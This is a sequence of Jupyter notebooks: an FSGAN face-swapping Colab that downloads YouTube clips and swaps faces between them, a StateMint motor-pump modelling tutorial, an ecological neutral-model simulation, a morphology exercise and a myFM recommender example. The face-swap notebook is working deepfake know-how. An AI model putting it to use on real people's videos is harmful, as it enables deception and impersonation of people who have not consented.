###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Initialize face swapping
###Code
import os
from fsgan.inference.swap import FaceSwapping
from fsgan.criterions.vgg_loss import VGGLoss
#@markdown This step should only be done once unless one of the
#@markdown following parameters is changed:
#@markdown ---
#@markdown Path to the weights directory (make sure it is correct):
weights_dir = '/content/drive/My Drive/fsgan/weights' #@param {type:"string"}
#@markdown Number of finetune iterations on the source subject:
finetune_iterations = 800 #@param {type:"slider", min:100, max:2000, step:1}
#@markdown If True, the inner part of the mouth will be removed from the segmentation:
seg_remove_mouth = True #@param {type:"boolean"}
#@markdown ---
detection_model = os.path.join(weights_dir, 'v2/WIDERFace_DSFD_RES152.pth')
pose_model = os.path.join(weights_dir, 'shared/hopenet_robust_alpha1.pth')
lms_model = os.path.join(weights_dir, 'v2/hr18_wflw_landmarks.pth')
seg_model = os.path.join(weights_dir, 'v2/celeba_unet_256_1_2_segmentation_v2.pth')
reenactment_model = os.path.join(weights_dir, 'v2/nfv_msrunet_256_1_2_reenactment_v2.1.pth')
completion_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_inpainting_v2.pth')
blending_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_blending_v2.pth')
criterion_id_path = os.path.join(weights_dir, 'v2/vggface2_vgg19_256_1_2_id.pth')
criterion_id = VGGLoss(criterion_id_path)
face_swapping = FaceSwapping(
detection_model=detection_model, pose_model=pose_model, lms_model=lms_model,
seg_model=seg_model, reenactment_model=reenactment_model,
completion_model=completion_model, blending_model=blending_model,
criterion_id=criterion_id,
finetune=True, finetune_save=True, finetune_iterations=finetune_iterations,
    seg_remove_mouth=seg_remove_mouth, batch_size=16, seg_batch_size=48,
encoder_codec='mp4v')
###Output
_____no_output_____
###Markdown
Optional: Download source video from YouTube. You can change the source URL, start and end times [hh:mm:ss]. Alternatively, manually upload an image or video to **_data_** (in the menu to the left) and rename to **_source.jpg_** or **_source.mp4_** (click "Refresh" if missing). By default the source video will be taken from the repository examples.
###Code
source_url = 'https://www.youtube.com/watch?v=z_IdXHSmYNs' #@param {type:"string"}
source_start = '00:00:25' #@param {type:"string"}
source_end = '00:00:30' #@param {type:"string"}
!mkdir -p /content/data
!rm -dr /content/data/source*
!youtube-dl $source_url --merge-output-format mp4 -o /content/data/source_tmp.mp4
!ffmpeg -y -i /content/data/source_tmp.mp4 -ss $source_start -to $source_end -r 25 /content/data/source.mp4
!rm /content/data/source_tmp.mp4
display_video('/content/data/source.mp4')
###Output
_____no_output_____
###Markdown
Optional: Download target video from YouTube. You can change the target URL, start and end times [hh:mm:ss]. Alternatively, manually upload a video to **_data_** (in the menu to the left) and rename to **_target.mp4_** (click "Refresh" if missing). By default the target video will be taken from the repository examples.
###Code
target_url = 'https://youtu.be/HOyMZO_X7xE' #@param {type:"string"}
target_start = '00:00:00' #@param {type:"string"}
target_end = '00:00:06' #@param {type:"string"}
!mkdir -p /content/data
!rm -dr /content/data/target*
!youtube-dl $target_url --merge-output-format mp4 -o /content/data/target_tmp.mp4
!ffmpeg -i /content/data/target_tmp.mp4 -ss $target_start -to $target_end -r 25 /content/data/target.mp4
!rm /content/data/target_tmp.mp4
#display_video('/content/data/target.mp4')
###Output
_____no_output_____
###Markdown
Do face swapping
###Code
# Do face swapping
#@markdown ---
#@markdown Toggle whether to finetune the reenactment generator:
finetune = True #@param {type:"boolean"}
#@markdown Source selection method ["longest" | sequence number]:
select_source = 'longest' #@param {type:"string"}
#@markdown Target selection method ["longest" | sequence number]:
select_target = 'longest' #@param {type:"string"}
#@markdown ---
source_path = '/content/data/source.mp4'
target_path = '/content/data/target.mp4'
output_tmp_path = '/content/data/output_tmp.mp4'
output_path = '/content/output.mp4'
face_swapping(source_path, target_path, output_tmp_path,
select_source, select_target, finetune)
# Encode with audio and display result
encode_audio(output_tmp_path, target_path, output_path)
os.remove(output_tmp_path)
display_video(output_path)
###Output
_____no_output_____ |
python/Example.ipynb | ###Markdown
StateMint. There are two methods for using StateMint: one is to install the Python package on your computer and write Python scripts to solve and interact with the solution; the other is to use the web interface. This notebook will focus on how to interact with StateMint in a Python script. Before we begin we need to import a few libraries, including `StateMint`.
###Code
import matplotlib.pyplot as plt
import numpy as np
import StateMint
from StateMint import to_numpy
import sympy
sympy.init_printing()
%matplotlib inline
###Output
_____no_output_____
###Markdown
Now that the required libraries have been imported we can start working on a problem. In this case we will be working on the problem set forth in the [tutorial](https://github.com/CameronDevine/StateMint/blob/tutorial/tutorial.md). This problem consists of a motor powering a pump through a flexible shaft. This pump pushes water through an elbow with a known resistance and out into the atmosphere. A diagram of the physical system can be seen below. The following equations for this system were found in the tutorial:
###Code
InVars = [
'Vs']
StVarElEqns = [
"tk' = kt * wk"]
OtherElEqns = [
'vR = R * iR',
"vL = L * iL'",
'i1 = -Kv * t2',
'w2 = Kv * v1',
'w3 = Q4 / -D',
'P4 = t3 / D',
'QR = PR / Rf']
Constraints = [
'iL = i1',
'iR = i1',
't2 = -tk',
't3 = tk',
'Q4 = QR',
'v1 = Vs - vR - vL',
'wk = w2 - w3',
'PR = P4']
OutputVars = [
'QR']
###Output
_____no_output_____
###Markdown
Now using the `StateMint.Solve` command the solution can be found.
###Code
sys = StateMint.Solve(InVars, StVarElEqns, OtherElEqns, Constraints, OutputVars)
###Output
_____no_output_____
###Markdown
Now that the solution has been found, different parts of the equation can be viewed including the $A$ matrix,
###Code
sys.A
###Output
_____no_output_____
###Markdown
the state equation,
###Code
sys.StateEq
###Output
_____no_output_____
###Markdown
or the transfer function,
###Code
sys.TF
###Output
_____no_output_____
###Markdown
The results can also be viewed in other languages such as LaTeX,
###Code
print(sympy.latex(sys.A))
###Output
\left[\begin{matrix}- \frac{kt \left(D^{2} Kv^{2} R Rf - 1\right)}{D^{2} Rf \left(Kv^{2} L kt + 1\right)}\end{matrix}\right]
###Markdown
or Matlab,
###Code
print(sympy.octave_code(sys.A))
###Output
-kt.*(D.^2.*Kv.^2.*R.*Rf - 1)./(D.^2.*Rf.*(Kv.^2.*L.*kt + 1))
###Markdown
Other `sympy` functions can also be used to manipulate the equations if desired. However at this point we will substitute in values for the constants to allow us to simulate the system. This process starts by defining the values for each constant.
###Code
Values = {
'R': 5,
'L': 0.1,
'Kv': 1000,
'kt': 10,
'D': 0.0015,
'Rf': 4e6
}
###Output
_____no_output_____
###Markdown
Now the state equation matrices can be converted to `numpy` matrices.
###Code
A = to_numpy.matrix(sys.A, Values)
B = to_numpy.matrix(sys.B, Values)
C = to_numpy.matrix(sys.C, Values)
D = to_numpy.matrix(sys.D, Values)
###Output
_____no_output_____
###Markdown
A Forward Euler method can now be used to simulate the system given the initial condition `x0`.
###Code
dt = 0.0001
x0 = np.matrix([[0]])
tf = 0.15
Vs = np.matrix([[12]])
x = np.matrix(np.ndarray((A.shape[0], int(tf/dt) + 1)))
y = np.matrix(np.ndarray((C.shape[0], int(tf/dt) + 1)))
x[:,0] = x0
y[:,0] = C * x0 + D * Vs
for i in range(int(tf/dt)):
x[:,i+1] = x[:,i] + dt * (A * x[:,i] + B * Vs)
y[:,i+1] = C * x[:,i+1] + D * Vs
###Output
_____no_output_____
###Markdown
This data can now be plotted to view the system's time response.
###Code
plt.plot(np.arange(0, tf, dt), y.T.A[:,0])
plt.ylabel('$Q_R(t)$ (L/s)')
plt.xlabel('time (s)')
###Output
_____no_output_____
###Markdown
StateMint. There are three methods for using StateMint: one is to install the Python package on your computer and write Python scripts to solve and interact with the solution; the others are to use the web interface or the Mathematica package. This notebook will focus on how to interact with StateMint in a Python script. Before we begin we need to import a few libraries, including `StateMint`.
###Code
import matplotlib.pyplot as plt
import numpy as np
import StateMint
from StateMint import to_numpy
import sympy
sympy.init_printing()
%matplotlib inline
###Output
_____no_output_____
###Markdown
Now that the required libraries have been imported we can start working on a problem. In this case we will be working on the problem set forth in the [tutorial](https://github.com/CameronDevine/StateMint/blob/master/tutorial.md). This problem consists of a motor powering a pump through a flexible shaft. This pump pushes water through an elbow with a known resistance and out into the atmosphere. A diagram of the physical system can be seen below. The following equations for this system were found in the tutorial:
###Code
InVars = [
'Vs']
StVarElEqns = [
"tk' = kt * wk"]
OtherElEqns = [
'vR = R * iR',
"vL = L * iL'",
'i1 = -Kv * t2',
'w2 = Kv * v1',
'w3 = Q4 / -D',
'P4 = t3 / D',
'QR = PR / Rf']
Constraints = [
'iL = i1',
'iR = i1',
't2 = -tk',
't3 = tk',
'Q4 = QR',
'v1 = Vs - vR - vL',
'wk = w2 - w3',
'PR = P4']
OutputVars = [
'QR']
###Output
_____no_output_____
###Markdown
Now using the `StateMint.Solve` command the solution can be found.
###Code
sys = StateMint.Solve(InVars, StVarElEqns, OtherElEqns, Constraints, OutputVars)
###Output
_____no_output_____
###Markdown
Now that the solution has been found, different parts of the equation can be viewed, including the $A$ matrix,
###Code
sys.A
###Output
_____no_output_____
###Markdown
the state equation,
###Code
sys.StateEq
###Output
_____no_output_____
###Markdown
or the transfer function,
###Code
sys.TF
###Output
_____no_output_____
###Markdown
The results can also be viewed in other languages such as LaTeX,
###Code
print(sympy.latex(sys.A))
###Output
\left[\begin{matrix}- \frac{kt \left(D^{2} Kv^{2} R Rf - 1\right)}{D^{2} Rf \left(Kv^{2} L kt + 1\right)}\end{matrix}\right]
###Markdown
or Matlab,
###Code
print(sympy.octave_code(sys.A))
###Output
-kt.*(D.^2.*Kv.^2.*R.*Rf - 1)./(D.^2.*Rf.*(Kv.^2.*L.*kt + 1))
###Markdown
Other `sympy` functions can also be used to manipulate the equations if desired. However at this point we will substitute in values for the constants to allow us to simulate the system. This process starts by defining the values for each constant.
###Code
Values = {
'R': 5,
'L': 0.1,
'Kv': 1000,
'kt': 10,
'D': 0.0015,
'Rf': 4e6
}
###Output
_____no_output_____
###Markdown
Now the state equation matrices can be converted to `numpy` matrices.
###Code
A = to_numpy.matrix(sys.A, Values)
B = to_numpy.matrix(sys.B, Values)
C = to_numpy.matrix(sys.C, Values)
D = to_numpy.matrix(sys.D, Values)
###Output
_____no_output_____
###Markdown
A Forward Euler method can now be used to simulate the system given the initial condition `x0`.
###Code
dt = 0.0001
x0 = np.matrix([[0]])
tf = 0.15
Vs = np.matrix([[12]])
x = np.matrix(np.ndarray((A.shape[0], int(tf/dt) + 1)))
y = np.matrix(np.ndarray((C.shape[0], int(tf/dt) + 1)))
x[:,0] = x0
y[:,0] = C * x0 + D * Vs
for i in range(int(tf/dt)):
x[:,i+1] = x[:,i] + dt * (A * x[:,i] + B * Vs)
y[:,i+1] = C * x[:,i+1] + D * Vs
###Output
_____no_output_____
###Markdown
This data can now be plotted to view the system's time response.
###Code
plt.plot(np.arange(0, tf, dt), y.T.A[:,0])
plt.ylabel('$Q_R(t)$ (L/s)')
plt.xlabel('time (s)')
###Output
_____no_output_____ |
Fisher Mehta neutral model annotated.ipynb | ###Markdown
Introduction. One way of generating a neutral time series is to consider a lattice of N individuals on which, every time step, one individual is replaced by another. Each individual of the lattice has an equal probability of being replaced (probability is $1/N$). The disappearance of the first species can be interpreted as the result of either death or emigration. The replacing individual is either the result of immigration or growth. The probability of immigration depends on the immigration rate ($0 \leq \lambda \leq 1$). In case of an immigration event, all species of the external species pool $S$ have an equal probability of immigrating. The probability of a growth event is thus given by the remaining $1 - \lambda$. In case of growth, every individual has an equal probability of growing. Time series generated in this way depend on three variables: the length of the simulation time $T$, the immigration probability $\lambda$ and the number of individuals $N$. We study the effect of these three variables on both neutrality measures. Standard imports
###Code
# Data manipulation
import pandas as pd
import numpy as np
# Options for pandas
pd.options.display.max_columns = 50
pd.options.display.max_rows = 30
from IPython import get_ipython
ipython = get_ipython()
# autoreload extension
if 'autoreload' not in ipython.extension_manager.loaded:
%load_ext autoreload
%autoreload 2
import matplotlib.pyplot as plt
from matplotlib import gridspec
%matplotlib inline
import time
np.random.seed(int(time.time()))
###Output
_____no_output_____
###Markdown
Specific imports
###Code
from timeseries_plotting import PlotTimeseries
from noise_properties_plotting import PiecewiseNormalize
from enum import Enum
###Output
_____no_output_____
###Markdown
Settings figures
###Code
from elife_settings import set_elife_settings, ELIFE
set_elife_settings()
###Output
_____no_output_____
###Markdown
Figure neutrality
###Code
class NeutralityTest(Enum):
KULLBACKLEIBLER = 1
COVARIANCE = 2
def plot_neutrality(f, type=NeutralityTest.KULLBACKLEIBLER, ax=0, ax_clb=0):
if isinstance(f, str):
df = pd.read_csv(f, index_col=0)
elif isinstance(f, list): # average of all files
df = pd.DataFrame(np.nanmedian([pd.read_csv(fi, index_col=0).values for fi in f], axis=0),
columns=pd.read_csv(f[0], index_col=0).columns,
index=pd.read_csv(f[0], index_col=0).index)
df[df == np.inf] = 1e4
if ax == 0:
fig = plt.figure()
gs = gridspec.GridSpec(1, 2, width_ratios=[9, 1], wspace=0.3)
ax = fig.add_subplot(gs[0])
ax_clb = fig.add_subplot(gs[1])
ax.set_facecolor('lightgrey')
if type == NeutralityTest.KULLBACKLEIBLER:
vmin = -1
vmax = 3
with np.errstate(divide='ignore'):
log_KL = np.log10(df.T)
mat = ax.matshow(log_KL, origin='lower', cmap='Blues_r',
aspect='auto', vmin=vmin, vmax=vmax)
elif type == NeutralityTest.COVARIANCE:
vmin = -5
vmax = 0 # pvalue is max 1 = 1e0
norm = PiecewiseNormalize([vmin, np.log10(0.05), vmax], [0, 0.5, 1])
with np.errstate(divide='ignore'):
log_nct = np.log10(df.T)
mat = ax.matshow(log_nct, origin='lower', norm=norm,
cmap='seismic_r', aspect='auto', vmin=vmin, vmax=vmax)
skiplabel = 0
ax.set_xticks(range(0, df.shape[0], (skiplabel+1)))
ax.set_xticklabels(['%d' % i for i in df.index][::(skiplabel+1)])
ax.set_yticks(range(0, df.shape[1], (skiplabel+1)))
ax.set_yticklabels(
['%.3f' % i for i in df.columns.astype(float)][::(skiplabel+1)])
ax.set_xlabel('Size community')
ax.set_ylabel(r'Immigration probability $\lambda$')
if ax_clb != 0:
plt.colorbar(mat, cax=ax_clb)
if type == NeutralityTest.KULLBACKLEIBLER:
ax_clb.set_title(r'log$_{10}$(D$_{KL}$)')
ax_clb2 = ax_clb.twinx()
ax_clb2.yaxis.set_ticks_position('right')
ax_clb.yaxis.set_ticks_position('left')
ax_clb2.yaxis.set_ticks([0.05, 0.95])
ax_clb2.set_ylim([0, 1])
ax_clb2.yaxis.set_ticklabels(['neutral', 'niche'])
elif type == NeutralityTest.COVARIANCE:
ax_clb.set_title(r'log$_{10}$($p_{NCT}$)')
ax_clb2 = ax_clb.twinx()
ax_clb2.yaxis.set_ticks_position('right')
ax_clb.yaxis.set_ticks_position('left')
ax_clb2.yaxis.set_ticks([1+(vmin + np.log10(0.05))/(vmax - vmin)/2,
1+(vmax + np.log10(0.05))/(vmax - vmin)/2])
ax_clb2.set_ylim([0, 1])
ax_clb2.yaxis.set_ticklabels(['niche', 'neutral'])
###Output
_____no_output_____
###Markdown
Generating neutral timeseries
###Code
new = False
lamda = 0.01 # immigration probability
T = int(1e7)
tskip = 999
S = 50 # amount of different species
J = 5000 # Number of individuals in the community
f = 'test_neutral4.txt'
def neutral_timeseries(S, lamda, J, tskip=1e3, T=int(1e6), f=0):
initcond = np.arange(J/S, J+1, J/S)
x = np.copy(initcond)
x_ts = np.copy(initcond)
# save x as cumulative distribution, it makes simulations faster
for i in range(T):
if i % 1e6 == 0:
print(i)
if np.random.uniform(0, 1) < lamda: # immigration from outside pool
immi = int(np.random.uniform()*S)
x[immi:] += 1
else:
growing = int(np.random.uniform()*J)
x[x > growing] += 1
dead = int(np.random.uniform()*(J+1))
x[x > dead] -= 1
if i % (tskip + 1) == 0:
x_ts = np.vstack((x_ts, x))
# transform cumulative distribution into abundances
for i in range(1, S):
x_ts[:, -i] = x_ts[:, -i] - x_ts[:, -i-1]
if f != 0:
np.savetxt(f, x_ts, fmt='%d')
return x_ts
if new:
neutral_timeseries(S, lamda, J, tskip, T, f)
###Output
_____no_output_____
###Markdown
Plot some neutral timeseries.
###Code
fig = plt.figure()
for i, l in enumerate(['', '2', '3', '4'], start=1):
ax = fig.add_subplot(2, 2, i)
ts_np = np.loadtxt('results/neutral_timeseries/ts_neutral' + l + '.txt').T
ts = pd.DataFrame(
ts_np, columns=['species_%d' % i for i in range(1, ts_np.shape[1]+1)])
ts['time'] = range(len(ts))
PlotTimeseries(ts, ax=ax)
plt.show()
###Output
findfont: Font family ['Open Sans'] not found. Falling back to DejaVu Sans.
###Markdown
Calculate neutrality measures for timeseries.
###Code
def neutral_measures(fKL, fNCT,
Js=[50, 100, 500, 1000, 2500, 5000],
lamdas=[0, 0.001, 0.01, 0.1, 0.25, 0.5, 0.75, 1]):
KL = np.zeros([len(Js), len(lamdas)])
NCT = np.zeros([len(Js), len(lamdas)])
for i, J in enumerate(Js):
for j, lamda in enumerate(lamdas):
print(J, lamda)
x_ts = neutral_timeseries(S, lamda, J, tskip=0, T=int(1e4))
KL[i, j] = KullbackLeibler_neutrality(x_ts[:, :-1])
for k in range(len(x_ts)):
s = sum(x_ts[k])
if s > 0:
x_ts[k] /= s
NCT[i, j] = neutral_covariance_test(
x_ts, ntests=500, method='Kolmogorov')
KL = pd.DataFrame(KL, index=Js, columns=lamdas)
KL.to_csv(fKL)
NCT = pd.DataFrame(NCT, index=Js, columns=lamdas)
NCT.to_csv(fNCT)
return KL, NCT
###Output
_____no_output_____
###Markdown
Plot the neutrality measures.
###Code
fig = plt.figure(figsize=(ELIFE.TEXTWIDTH, 3))
gs = gridspec.GridSpec(2, 4, wspace=0.05, hspace=0.3,
right=0.82, bottom=0.18, top=0.9)
gs_clb = gridspec.GridSpec(2, 1, hspace=0.35, top=0.9,
bottom=0.18, left=0.88, right=0.9)
gs_tot = gridspec.GridSpec(1, 1, top=0.95, bottom=0.08, left=0.07, right=0.82)
ax_clb_KL = fig.add_subplot(gs_clb[0])
ax_clb_NCT = fig.add_subplot(gs_clb[1])
for i, s in enumerate(['1e4', '1e5', '1e6', '1e7']):
ax_KL = fig.add_subplot(gs[0, i])
ax_NCT = fig.add_subplot(gs[1, i])
ax_KL.set_title('T = 10$^{%d}$' % int(s[-1]))
path = 'results/neutral_timeseries/'
if i == 0:
plot_neutrality([path + 'KL-%s-' % s + '%d.csv' % j for j in range(0, 6)],
ax=ax_KL, ax_clb=ax_clb_KL)
plot_neutrality([path + 'NCT-%s-' % s + '%d.csv' % j for j in range(0, 6)],
type=NeutralityTest.COVARIANCE,
ax=ax_NCT, ax_clb=ax_clb_NCT)
ax_KL.tick_params(axis="both", bottom=True, labelbottom=False, top=False, labeltop=False,
left=True, labelleft=True)
ax_NCT.tick_params(axis="both", bottom=True, labelbottom=True, top=False, labeltop=False,
left=True, labelleft=True)
ax_KL.text(-0.08, 1.15, 'A', transform=ax_KL.transAxes,
fontsize=10, fontweight='bold', va='top', ha='right')
ax_NCT.text(-0.08, 1.15, 'B', transform=ax_NCT.transAxes,
fontsize=10, fontweight='bold', va='top', ha='right')
else:
plot_neutrality([path + 'KL-%s-' % s + '%d.csv' % j for j in range(0, 6)],
ax=ax_KL)
plot_neutrality([path + 'NCT-%s-' % s + '%d.csv' % j for j in range(0, 6)],
type=NeutralityTest.COVARIANCE,
ax=ax_NCT)
ax_KL.tick_params(axis="both", bottom=True, labelbottom=False, top=False, labeltop=False,
left=True, labelleft=False)
ax_NCT.tick_params(axis="both", bottom=True, labelbottom=True, top=False, labeltop=False,
left=True, labelleft=False)
ax_NCT.tick_params(axis='x', rotation=90)
ax_KL.set_xlabel('')
ax_NCT.set_xlabel('')
ax_KL.set_ylabel('')
ax_NCT.set_ylabel('')
ax = fig.add_subplot(gs_tot[0], frameon=False)
ax.tick_params(axis="both", bottom=False, labelbottom=False,
left=False, labelleft=False)
ax.set_xlabel('Size community', x=1, ha='right')
ax.set_ylabel('Immigration probability $\lambda$')
plt.show()
###Output
findfont: Font family ['Open Sans'] not found. Falling back to DejaVu Sans.
|
files/Morpho_TD3.ipynb | ###Markdown
The third morpho-math practical session (TD). Getting started: the required environments
###Code
## to get inline figures
%matplotlib inline
## the bare minimum of imports
import matplotlib.pylab as plt
import numpy as np
from copy import deepcopy
import morphograph as mg
from morphograph import Graph
def changeAdjacency(graph,type='4'):
    '''
    Changes the adjacency of a graph
    '''
    nodes=graph.get_nodes() ## get the vertices
    W = graph.get_W()
    H = graph.get_H()
    edges = [] ## edge structure
    ## 4-connectivity
    if (type == '4'):
        for y in range(0,H-1):
            for x in range(0,W-1):
                i = y * W + x
                edges.append([i,i+1,0]) # all edges are weighted zero
                edges.append([i,i+W,0]) # for now
        # edges along the last row and column
        for x in range(0,W-1):
            i = (H-1)*W + x
            edges.append([i,i+1,0])
        for y in range(0,H-1):
            i = y * W + (W-1)
            edges.append([i,i+W,0])
    ## 8-connectivity
    if (type == '8'):
        for y in range(0,H-1):
            for x in range(1,W-1):
                i = y * W + x
                edges.append([i,i+1,0]) # all edges are weighted zero
                edges.append([i,i+W,0]) # for now
                edges.append([i,i+W+1,0]) # NW-SE
                edges.append([i,i+W-1,0]) # NE-SW
        # vertical edges at the first and last columns
        for y in range(0,H-1):
            i = y * W + (W-1)
            edges.append([i,i+W,0])
            edges.append([i,i+W-1,0])
            i = y * W
            edges.append([i,i+1,0])
            edges.append([i,i+W+1,0])
            edges.append([i,i+W,0])
        # horizontal edges on the last row
        for x in range(0,W-1):
            i = (H-1)*W + x
            edges.append([i,i+1,0])
    if (type == 'H'): ## horizontal adjacency
        for y in range(0,H-1):
            for x in range(0,W-1):
                i = y * W + x
                edges.append([i,i+1,0]) # horizontal edges only
        # horizontal edges on the last row
        for x in range(0,W-1):
            i = (H-1)*W + x
            edges.append([i,i+1,0])
    if (type == 'V'): ## vertical adjacency
        for y in range(0,H-1):
            for x in range(0,W-1):
                i = y * W + x
                edges.append([i,i+W,0]) # vertical edges only
        # vertical edges on the last column
        for y in range(0,H-1):
            i = y * W + (W-1)
            edges.append([i,i+W,0])
    ### Also define the two diagonals as two separate adjacencies.
    if (type == 'D1'):
        for y in range(0,H-1):
            for x in range(1,W-1):
                i = y * W + x
                edges.append([i,i+W+1,0]) # NW-SE
        # edges from the first column
        for y in range(0,H-1):
            i = y * W
            edges.append([i,i+W+1,0])
    ## second diagonal adjacency (NE-SW)
    if (type == 'D2'):
        for y in range(0,H-1):
            for x in range(1,W-1):
                i = y * W + x
                edges.append([i,i+W-1,0]) # NE-SW
        # edges from the last column
        for y in range(0,H-1):
            i = y * W + (W-1)
            edges.append([i,i+W-1,0])
    return(Graph(edges,nodes,W,H))
###Output
_____no_output_____
###Markdown
Checking the adjacencies
###Code
Bands=mg.read_graph("images/bands.txt")
Bands.display()
BandsH = changeAdjacency(Bands,"H")
BandsH.display()
BandsV = changeAdjacency(Bands,"V")
BandsV.display()
Bands8 = changeAdjacency(Bands,"8")
Bands8.display()
plt.show()
BandsD1 = changeAdjacency(Bands,"D1")
BandsD1.display()
plt.show()
BandsD1 = changeAdjacency(Bands,"D2")
BandsD1.display()
plt.show()
###Output
_____no_output_____
###Markdown
Example of using the Graph class
###Code
import importlib
import morphograph
importlib.reload(morphograph)
FP = mg.read_graph("images/FP.txt")
FPH = changeAdjacency(FP,"H")
FPcloH=mg.fermeture(FPH)
FPV = changeAdjacency(FP,"V")
FPcloV = mg.fermeture(FPV)
FPD1 = changeAdjacency(FP,"D1")
FPcloD1=mg.fermeture(FPD1)
FPD2 = changeAdjacency(FP,"D2")
FPcloD2=mg.fermeture(FPD2)
###Output
_____no_output_____
###Markdown
Using 4 different closings
###Code
FPcloH.show(inv=True)
FPcloV.show(inv=True)
FPcloD1.show(inv=True)
FPcloD2.show(inv=True)
###Output
_____no_output_____
###Markdown
compute the inf between two images
###Code
## this assumes the data is in the same order for both images
def applyDualNodeOperator(g1,g2, dual_op_, verify=True):
"""
applies a generic scalar Dual operator on the nodes of G1 and G2 and returns a new graph
applique un operateur sur les sommets de deux graphes G1 et G2 et produit un nouveau graphe
"""
mynodes_out = deepcopy(g1.get_nodes())
mynodes_in = g2.get_nodes() # read only, no need to copy
W = g1.get_W()
H = g1.get_H()
if (not verify):
for i in range(0,W*H):
            mynodes_out[i][2] = dual_op_(mynodes_out[i][2],mynodes_in[i][2])
else:
for i in range(0,g1.get_H()*g1.get_W()):
if ((mynodes_out[i][0] == mynodes_in[i][0]) and (mynodes_out[i][1] == mynodes_in[i][1])):
mynodes_out[i][2] = dual_op_(mynodes_out[i][2],mynodes_in[i][2])
return(Graph(g1.get_edges(), mynodes_out, W,H))
def inf(g1, g2, verify=True):
"""
Pointwise infimum
Minimum point à point
"""
return(applyDualNodeOperator(g1,g2,min, verify=verify))
def sup(g1, g2, verify=True):
"""
Pointwise supremum (maximum node by node)
"""
return(applyDualNodeOperator(g1,g2,max, verify=verify))
def sub_op(v1,v2):
return(v1-v2)
def sub(g1,g2, verify=True):
"""
Pointwise subtraction (difference node by node)
"""
return(applyDualNodeOperator(g1,g2,sub_op,verify=verify))
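## Added illustration (not part of the original notebook): applyDualNodeOperator
## accepts any binary scalar function, so further pointwise operations can be
## defined in the same way, for example a pointwise average of two graphs.
def avg_op(v1, v2):
    return (v1 + v2) / 2
def avg(g1, g2, verify=True):
    """
    Pointwise average (mean node by node)
    """
    return applyDualNodeOperator(g1, g2, avg_op, verify=verify)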
FP=mg.read_graph("images/FP.txt")
FP.show(inv=True)
FPclo4 = mg.fermeture(FP)
FPclo4.show(inv=True)
FPH = changeAdjacency(FP,"H")
FPcloH=mg.fermeture(FPH)
FPV = changeAdjacency(FP,"V")
FPcloV = mg.fermeture(FPV)
FPcloHV = inf(FPcloV,FPcloH)
FPcloHV.show(inv=True)
minVH = inf(FPcloH,FPcloV)
minD1D2 = inf(FPcloD1,FPcloD2)
minOrient = inf(minVH,minD1D2)
fig=plt.figure(figsize=(16,16))
ax1 = fig.add_subplot(1,2,1)
ax1.axis('off')
ax1.imshow(FP.image(),cmap="gray_r")
ax2 = fig.add_subplot(1,2,2)
ax2.axis('off')
ax2.imshow(minOrient.image(),cmap="gray_r")
gdiff = sub(minOrient, FP)
gdiff.show(inv=True)
## The opening case
FP=mg.read_graph("images/FP.txt")
FP.show(inv=True)
FPopen4 = mg.ouverture(FP)
FPopen4.show(inv=True)
FPH = changeAdjacency(FP,"H")
FPopeH=mg.ouverture(FPH)
FPV = changeAdjacency(FP,"V")
FPopeV = mg.ouverture(FPV)
FPopeHV = sup(FPopeV,FPopeH)
FPopeHV.show(inv=True)
FPD1 = changeAdjacency(FP,"D1")
FPopeD1=mg.ouverture(FPD1)
FPD2 = changeAdjacency(FP,"D2")
FPopeD2 = mg.ouverture(FPD2)
FPopeHV = sup(FPopeV,FPopeH)
FPopeD = sup(FPopeD1,FPopeD2)
FPopeDir = sup(FPopeHV,FPopeD)
FPopeDir.show(inv=True)
dat=gdiff.image()
dat.max()
FPHclo=erode(FPHdil)
FPHclo.show(inv=True)
###Output
_____no_output_____
###Markdown
Operators. We write $\delta_H(G)$ for the horizontal dilation of the graph $G$, $\varepsilon_H(G)$ for the horizontal erosion of $G$, $\psi_H(G)=\varepsilon_H(\delta_H(G))$ for the horizontal closing of $G$, and $\gamma_H(G)=\delta_H(\varepsilon_H(G))$ for the horizontal opening of $G$. Compute $\gamma_H(G)$...
###Code
FPHero=erode(FPH)
FPHopen=dilate(FPHero)
FPHopen.show(inv=True)
###Output
_____no_output_____ |
examples/ml-100k-extended.ipynb | ###Markdown
User Relation Block to express data. See [\[Rendle 2013\]](http://www.vldb.org/pvldb/vol6/p337-rendle.pdf) for how the complexity decreases drastically in this case (and in most cases with a bipartite graph structure).
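To see the indirection that the RelationBlocks below rely on, here is a tiny, self-contained illustration (added for this write-up, not part of the original pipeline): `np.unique(..., return_inverse=True)` yields one entry per unique entity plus an index array that maps every rating row back to its entity, so per-user and per-movie features need to be stored only once.
###Code
# Standalone illustration of the unique/inverse indirection used below.
import numpy as np
user_ids = np.array([10, 42, 10, 7, 42, 42])
unique_users, user_map = np.unique(user_ids, return_inverse=True)
# unique_users -> array([ 7, 10, 42]) : one entry (one feature row) per user
# user_map     -> array([1, 2, 1, 0, 2, 2]) : maps each rating row to its user
assert (unique_users[user_map] == user_ids).all()
###Output
_____no_output_____
###Markdown
The same pattern is applied to the real data below.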
###Code
# Create RelationBlock.
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html
train_blocks = []
test_blocks = []
for source, target in [(df_train, train_blocks), (df_test, test_blocks)]:
unique_users, user_map = np.unique(source.user_id, return_inverse=True)
target.append(
RelationBlock(user_map, augment_user_id(unique_users))
)
unique_movies, movie_map = np.unique(source.movie_id, return_inverse=True)
target.append(
RelationBlock(movie_map, augment_movie_id(unique_movies))
)
if use_date:
X_date_train = date_encoder.to_sparse(df_train.timestamp.dt.date.values)
X_date_test = date_encoder.to_sparse(df_test.timestamp.dt.date.values)
else:
X_date_train = None
X_date_test = None
###Output
_____no_output_____
###Markdown
Regression
###Code
group_shapes = [len(date_encoder)] + user_encoder.encoder_shapes + movie_encoder.encoder_shapes
fm = myfm.MyFMRegressor(rank=10)
fm.fit(
X_date_train, df_train.rating.values, X_rel=train_blocks,
group_shapes=group_shapes,
X_test=X_date_test, X_rel_test=test_blocks,
y_test=df_test.rating.values,
n_iter=512, n_kept_samples=512
);
test_predictions = fm.predict(X_date_test, test_blocks)
rmse = (
(test_predictions - df_test.rating.values)**2
).mean() ** 0.5
mae = np.abs(test_predictions - df_test.rating).mean()
# Note the improvement from "id_only" case.
# Compare this with methods like ones in https://paperswithcode.com/sota/collaborative-filtering-on-movielens-100k
print('rmse={}, mae={}'.format(rmse, mae))
###Output
rmse=0.8835596352777759, mae=0.6942521867272365
###Markdown
Ordered Probit Regression
###Code
